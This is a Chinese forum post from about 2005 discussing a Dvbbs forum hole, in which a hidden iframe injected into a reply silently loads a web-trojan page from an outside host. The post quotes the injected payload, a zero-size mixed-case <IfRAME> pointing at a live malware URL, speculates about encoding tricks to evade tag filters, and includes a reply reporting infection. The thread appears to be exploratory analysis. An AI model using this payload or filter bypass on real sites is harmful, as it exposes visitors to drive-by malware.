文章作者：xxlgyq
信息来源：火狐技术联盟(www.wrsky.com)

该漏洞应该是应用了框架，在浏览着浏览此贴时，木马页也同时打开。不需要让浏览者点击连接地址实现网页木马。估计这一漏洞是动网最致命的。
http://yt2bbs.catv.net/dispbbs.a ... p;skin=0&page=3
有兴趣的朋友可以去解密，采用冰狐网页木马，小马是什么就不清楚了。

在次声明本帖绝对不是在本论坛放木马。这个漏洞刚刚出现。发出来大家探讨下。还有大家注意下 回复中没有8楼。8楼就是木马回复者帖子，但是看不到他的帖子

这可能是论坛中最致命的漏洞了

本技术论坛的老鸟们 有兴趣刨习下，也让我们菜鸟知道下原理。。。。。
小弟不材 没弄明白 明白的大哥加小弟QQ 59645
菜鸟就别加了 因为我也不会。
大家看看如下代码
var actioninfo3='单帖屏蔽';document.write (dvbbs_show_topic('776611','2','gaiyue','http://admin02.21isp.cn/inc/inc/lulu.htm','','gaiyue@tom.com','
上下代码不可以相连

(dvbbs_show_topic(&#39;776611&#39;,&#39;2&#39;,&#39;gaiyue&#39;,&#39;http://admin02.21isp.cn/inc/inc/lulu.htm&#39;,&#39;&#39;,&#39;gaiyue@tom.com&#39;,&#39;</Script><IfRAME height=0 width=0 sRc="http://admin02.21isp.cn/inc/inc/lulu.htm"></IFrAME>|||||||||<Script Language=JavaScript>var actioninfo3=\&#39;单帖屏蔽\&#39;|||||||||&#39;,&#39;&#39;,&#39;Images/userface/image1.gif&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;http://admin02.21isp.cn/inc/inc/lulu.htm&#39;,&#39;2005-6-30
看这个代码里面 用了 <iframe>框架标签但在论坛中此标签以被禁止。
在看看 他的<IfRAME>为什么f是小写呢？ 我就怀疑他是有问题的
毕竟论坛已经禁止<iframe>标签，正常发送带有<iframe>标签的帖子肯定不能正常显示，记得我看过一篇文章把字符转换成编码，例子<iframe>==<i#07rame>#07则表示字母F。这样是否会起到欺骗做用呢？
不清楚啊 高手指点
对技术 我很痴迷，搞1天都搞不动，我很生气。 ：）





szylk123的测试结果

级别: 骑士  
发帖: 353
威望: 66
财富: 468
注册时间:2005-04-17
最后登陆:2005-06-30        
--------------------------------------------------------------------------------



附件:


我日，真的中了，大家请仔细看图，浏览帖子的时候就是加载这一段网页代码．．．

问题在这..

看看这篇文章：http://www.lxqf.com/blog/blogview.asp?logID=379

http://www.neeao.com/Blog/article.asp?id=919